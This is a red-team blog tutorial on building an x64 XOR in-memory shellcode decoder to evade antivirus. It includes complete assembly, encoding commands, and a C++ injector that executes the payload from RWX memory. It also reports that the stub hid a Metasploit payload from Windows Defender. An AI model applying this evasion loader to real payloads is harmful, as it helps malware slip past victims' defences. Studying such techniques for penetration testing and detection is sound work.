Obfuscation: Polymorphic Decoder

Red teaming and penetration testing often require bypassing antivirus software in order to effectively uncover security vulnerabilities. In the previous part, we addressed obfuscating shellcode as UUIDs within the source code. This approach worked well; however, the shellcode was still detected and blocked once loaded into memory.

We now aim to address this with a polymorphic in-memory decoder: a small piece of shellcode that decodes another shellcode at runtime.

XOR Decoder

The XOR decoder was adapted from doyler.net and modified for the x64 architecture. This adaptation was relatively straightforward, as it primarily required renaming the appropriate registers. The decoder begins with the following instruction:

_start:
    jmp short call_decoder      ; Start of JMP-CALL-POP

JMP-CALL-POP is a classic technique for position-independent code: it lets the code find the runtime address of data embedded in it, regardless of where it is loaded in memory. In this first step, we jump forward to the label call_decoder.

call_decoder:
    call decoder        ; pushes the address of the next instruction (Shellcode) onto the stack
 
    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...

Here, the CALL instruction transfers control back to the decoder label. Before jumping, CALL pushes its return address, i.e. the address of the next instruction (in our case, the start of the shellcode), onto the stack, so RSP now points to that address.

decoder:
    pop rsi                     ; Move pointer to encoded shellcode into RSI from the stack

In the called section of the program, we retrieve the pointer from the stack into the RSI register, allowing us to determine the memory address of our shellcode.
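One reason for jumping forward first and then calling backward is that a backward CALL has a negative 32-bit displacement, which encodes as 0xFF bytes instead of 0x00 bytes. The sketch below computes the E8 rel32 encoding for both directions. The offsets (decoder at 0x02, call_decoder at 0x0D, Shellcode at 0x12) are an assumption derived from the instruction sizes visible in the hex dump later in this post.

```python
import struct

CALL_LEN = 5  # E8 opcode + 32-bit displacement

def call_rel32(call_addr: int, target: int) -> bytes:
    """Encode `call target` (E8 rel32) for a CALL located at call_addr."""
    # The displacement is measured from the next instruction, which is also
    # the return address CALL pushes onto the stack (later popped into RSI).
    rel = target - (call_addr + CALL_LEN)
    return b"\xe8" + struct.pack("<i", rel)

# Assumed stub layout: decoder at 0x02, call_decoder at 0x0D, Shellcode at 0x12
backward = call_rel32(0x0D, 0x02)
print(backward.hex(" "))                 # e8 f0 ff ff ff  (no null bytes)
print(hex(0x0D + CALL_LEN))              # 0x12: the address POP RSI receives

# Hypothetical forward call skipping 0x0B bytes, for comparison
forward = call_rel32(0x02, 0x02 + CALL_LEN + 0x0B)
print(forward.hex(" "))                  # e8 0b 00 00 00  (three null bytes)
```

A forward CALL over a short distance would leave three zero bytes in the displacement, which is exactly what the decoder must avoid.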

We now proceed to the actual decryption routine:

decode:
    xor byte [rsi], 0x3F      ; XOR the byte RSI points to with 0x3F
    jz Shellcode              ; leave the loop if the result is 0: [RSI] xor 0x3F = 0
    inc rsi                   ; increment RSI to decode the next byte
    jmp short decode          ; loop until every byte has been decoded

xor byte [rsi], 0x3F decodes the byte pointed to by RSI; in the first iteration, this is the first byte of the shellcode. The decryption key is 0x3F and must match the key that was used to encode the shellcode.

jz Shellcode then checks the zero flag set by the XOR, i.e. whether the decoded byte is 0x00.

$Byte \neq 0$

If the result is non-zero, execution continues with the next instruction: inc rsi

This increments RSI, pointing to the next byte of the shellcode, which will be decoded in the next iteration. jmp short decode jumps back to the beginning of the decoding routine.

$Byte = 0$

If the result is zero, the loop terminates and execution continues in the decoded shellcode. It is therefore important to append the key value itself to the end of the encoded shellcode, because:

0x3F XOR 0x3F = 0x00

This marks the end of the shellcode and breaks the loop, eliminating the need for a separate counter.
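To make the terminator logic concrete, here is a small Python model of the assembly loop. It is a sketch, not part of the original tooling: `encode` and `emulate_decoder` are hypothetical helpers, and the three input bytes are placeholders rather than the real calc.exe payload.

```python
KEY = 0x3F

def encode(payload: bytes, key: int = KEY) -> bytes:
    """XOR every byte with the key and append the key as terminator."""
    if 0 in payload:
        # A 0x00 would decode to 0x00 mid-payload and stop the loop early
        raise ValueError("payload contains a null byte")
    return bytes(b ^ key for b in payload) + bytes([key])

def emulate_decoder(buf: bytearray, key: int = KEY) -> int:
    """Mirror the asm loop: XOR in place until a byte decodes to 0.

    Returns the index of the terminator, where jz leaves the loop.
    """
    rsi = 0
    while True:
        buf[rsi] ^= key          # xor byte [rsi], key
        if buf[rsi] == 0:        # jz Shellcode
            return rsi
        rsi += 1                 # inc rsi ; jmp short decode

original = bytes.fromhex("4831c0")   # placeholder bytes, not the real payload
buf = bytearray(encode(original))
end = emulate_decoder(buf)
print(end, bytes(buf[:end]) == original)  # 3 True
```

Note that the terminator itself is left as 0x00 in memory after decoding, directly behind the decoded payload.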

jz Shellcode now jumps directly into our decrypted shellcode and begins execution.


calc.exe Payload

We want to use the calc.exe payload from this blog post. However, it still contains null bytes (0x00), which prevent proper decoding. Why is that? Here’s an example:

# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F

# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00

A null byte (0x00) in the original payload would prematurely terminate the decoding process: it decodes back to 0x00, and the jz Shellcode instruction interprets that as the signal to exit the loop. Therefore, we first need to remove all null bytes from the payload.
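Before encoding, it helps to know exactly where the null bytes are. A minimal Python sketch, assuming the raw (unencoded) payload is available as a file such as calc.raw; `null_offsets` and `report` are hypothetical helpers, not ShenCode functions.

```python
from pathlib import Path

def null_offsets(data: bytes) -> list[int]:
    """Return the offsets of all 0x00 bytes in a raw shellcode buffer."""
    return [i for i, b in enumerate(data) if b == 0]

def report(path: str) -> None:
    """Print every null byte found in a raw payload file (e.g. calc.raw)."""
    raw = Path(path).read_bytes()
    hits = null_offsets(raw)
    for off in hits:
        print(f"0x00 at offset {off} (0x{off:x})")
    print(f"{len(hits)} null byte(s) in {len(raw)} bytes")

# The GS instruction discussed below: 65 48 8b 00 -> null byte at offset 3
print(null_offsets(bytes.fromhex("65488b00")))   # [3]
```

Calling `report("calc.raw")` after the extraction step would list every offset that still needs fixing.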

GS Register

The fix for the GS register from the previous post eliminates only about $2/3$ of the null bytes. This was sufficient for earlier tests. However, a small adjustment removes the remaining null byte in this instruction:

	; before
	xor rax, rax
	mov al, 60h
	mov rax, gs:[rax]             ; 65 48 8b 00

	; after
	xor rax, rax
	mov rax, gs:[rax+0x60]        ; 65 48 8b 40 60

This also reduces our shellcode size by one byte: mov al, 60h (2 bytes) is no longer needed, while the 8-bit displacement adds only 1 byte.

Kernel32 Base

When locating the Kernel32 base address, we currently dereference RAX into RAX without any displacement (mov rax, [rax]). As with the GS access above, this operand combination encodes with a ModRM byte of 0x00, which introduces another null byte. Routing the first load through RBX changes the ModRM bytes and avoids the null byte, at the cost of overwriting RBX:

		; before
		mov rax, [rax]				; 48 8b 00
		mov rax, [rax]				; 48 8b 00
		; after
		mov rbx, [rax]				; 48 8b 18
		mov rax, [rbx]				; 48 8b 03
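Both null bytes fixed in the GS and Kernel32 code come from the same place: the ModRM byte that follows the 8B opcode. It packs a 2-bit mode, a 3-bit register field and a 3-bit r/m field, and RAX is register number 0, so `mov rax, [rax]` with no displacement yields ModRM 0x00. The sketch below shows the packing; it deliberately ignores REX extension bits, SIB bytes and the special r/m values 100 and 101, so treat it as an illustration rather than an assembler.

```python
def modrm(mod: int, reg: int, rm: int) -> int:
    """Pack an x86 ModRM byte: mod (2 bits) | reg (3 bits) | rm (3 bits)."""
    return (mod << 6) | (reg << 3) | rm

# Register numbers as used in the 3-bit ModRM fields
RAX, RBX = 0, 3

# mov rax, [rax]          mod=00 (no displacement)   -> 0x00, a null byte
print(hex(modrm(0b00, RAX, RAX)))   # 0x0
# mov rax, gs:[rax+0x60]  mod=01 (8-bit displacement) -> 0x40, then disp8 0x60
print(hex(modrm(0b01, RAX, RAX)))   # 0x40
# mov rbx, [rax]          reg=rbx                     -> 0x18
print(hex(modrm(0b00, RBX, RAX)))   # 0x18
# mov rax, [rbx]          rm=rbx                      -> 0x3
print(hex(modrm(0b00, RAX, RBX)))   # 0x3
```

Any change that moves either field away from zero, or that switches to a mode with a non-zero displacement, removes the null byte.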

JMP SHORT

	jmp short InvokeWinExec            ; eb 00

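Because InvokeWinExec is the very next instruction, this short jump has a displacement of zero and assembles to eb 00, which is both a null byte and effectively a no-op. Execution reaches the next instruction without it, so we can simply comment out this line.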
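The zero displacement follows directly from how short jumps are encoded: rel8 = target - (address of the jump + 2). A small sketch; the address 0x40 is hypothetical, while 0x0B and 0x03 are assumed positions of `jmp short decode` and `decode` inside the XOR stub.

```python
import struct

def jmp_short(jmp_addr: int, target: int) -> bytes:
    """Encode `jmp short target` (EB rel8) for a jump located at jmp_addr."""
    rel = target - (jmp_addr + 2)      # relative to the next instruction
    if not -128 <= rel <= 127:
        raise ValueError("target out of range for a short jump")
    return b"\xeb" + struct.pack("<b", rel)

# Target is the very next instruction: displacement 0 -> null byte
print(jmp_short(0x40, 0x42).hex(" "))   # eb 00
# The decoder's own `jmp short decode` loops back 10 bytes
print(jmp_short(0x0B, 0x03).hex(" "))   # eb f6
```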

Compilation

We can now assemble the code and obtain null-free machine code:

nasm -f win64 calc.asm -o calc.o

XOR Decoder Stub

Preparing the calc.exe Payload

We now need to further process the opcode so it can be used within the decoder. For this, I use my shellcode tool ShenCode:

python shencode.py extract -f calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py encode -f calc.raw -o calc.xor -x -xk 63
...
python shencode.py output -f calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!

Step-by-step:

  1. We extract the actual shellcode from calc.o and save it to calc.raw (from offset 60 to 311)
  2. We encode the extracted shellcode using the key 63 (decimal), which is 0x3F in hexadecimal, and store the result in calc.xor
  3. We generate output in C# array format (which we can also use for assembly)

We save the output, remove line breaks, and append our “magic byte” 0x3F to the end.
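The three steps above, plus the terminator, can be approximated in a few lines of Python. This is not ShenCode's implementation: `prepare_payload` is a hypothetical helper, and treating the last offset as exclusive is an assumption that should be checked against ShenCode's -fb/-lb semantics.

```python
KEY = 63  # 0x3F, the key passed as -xk 63

def prepare_payload(obj: bytes, first: int, last: int, key: int = KEY) -> str:
    """Cut, XOR-encode and format a payload for a NASM `db` line.

    Assumption: `last` is treated as exclusive.
    """
    raw = obj[first:last]                           # step 1: extract
    if 0 in raw:
        raise ValueError("raw payload still contains 0x00")
    encoded = bytes(b ^ key for b in raw)           # step 2: XOR-encode
    encoded += bytes([key])                         # append the "magic byte"
    return ",".join(f"0x{b:02x}" for b in encoded)  # step 3: format

demo = bytes(4) + bytes.fromhex("4831c0") + bytes(4)  # fake object file
print("Shellcode: db " + prepare_payload(demo, 4, 7))
# Shellcode: db 0x77,0x0e,0xff,0x3f
```

Checking for null bytes before encoding catches the problem early, instead of in the debugger.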

XOR Decoder and Payload

Now we can embed the payload into the XOR decoder. To do this, we copy the processed shellcode into the Shellcode: db line at the end of the XOR decoder:

; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f

Additionally, we verify that the XOR key matches:

decode:
    xor byte [rsi], 0x3F

If everything is correct, we compile the decoder:

nasm -f win64 xor-decoder.asm -o xor-decoder.o

Next, we locate the shellcode offsets, extract the stub, and prepare it for use in our Inject.cpp program:

python shencode.py output -i xor-decoder.o -s inspect
 
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80     Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00     Offset=329
0x00000336: 00 00 00 00 00 fe ff 00
 
python shencode.py extract -f xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
 
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!
 
python shencode.py output -f xor-decoder.stub -s c

[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f";
[+] DONE!
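The `output -s c` step essentially renders the stub bytes as a C string literal of \x escapes. A hypothetical stand-alone equivalent, for readers who want to reproduce it without ShenCode:

```python
from pathlib import Path

def to_c_literal(data: bytes) -> str:
    """Render bytes as a C/C++ string literal made of \\xNN escapes."""
    body = "".join(f"\\x{b:02x}" for b in data)
    return f'"{body}";'

def stub_to_c(path: str) -> str:
    """Read a raw stub file (e.g. xor-decoder.stub) and format it."""
    return to_c_literal(Path(path).read_bytes())

print(to_c_literal(bytes.fromhex("eb0b5e")))   # "\xeb\x0b\x5e";
```

Because every byte is escaped, a \x escape can never swallow a following hex-digit character, which is a common pitfall when mixing escapes and printable characters in C strings.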

Inject.cpp

We can now embed the processed shellcode bytes into our injector program and compile it as well.

#include <stdio.h>
#include <windows.h>
#include <iostream>
#include <cstring>      // memcpy
 
unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";
 
int main() {
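    // sizeof includes the string literal's trailing '\0'
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
    void* (*memcpyPtr) (void*, const void*, size_t);
    // RWX memory: the decoder XORs its own bytes in place, so the region
    // must be writable as well as executable
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpyPtr = &memcpy;
    memcpyPtr(exec, payload, byteArrayLength);
    // Jump into the decoder stub, which decodes and then runs the payload
    ((void(*)())exec)();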
    return 0;
}

Debug



To test the setup, I launched a debugger and navigated to the memory region containing the XOR decoder. During debugging, you can step through the execution and observe how the instructions in the lower section are gradually decrypted. This is clearly visible in the images below, just after the call instruction (which corresponds to Shellcode: db ...).

The animation effectively illustrates how the loop executes at the top while the shellcode below is progressively decrypted.


Test with a Metasploit Payload

The XOR decoder also worked successfully in combination with a Metasploit payload. In this case, Windows Defender was unable to detect or block it.


Conclusion

To simplify the process, I’ve integrated the XOR stub as a template into ShenCode. With just two commands, you can generate a complete XOR in-memory decoder:

python shencode.py encode -f input.raw -o xor.out --xor --xorkey 63
python shencode.py create --xor-stub --xor-filename xor.out --xor-outputfile stub.raw --xor-key 63

The XOR decoder adds an effective layer of obfuscation: the payload stays encoded until the decoder runs in memory. When combined with other obfuscation techniques, it can be a powerful tool for penetration testing.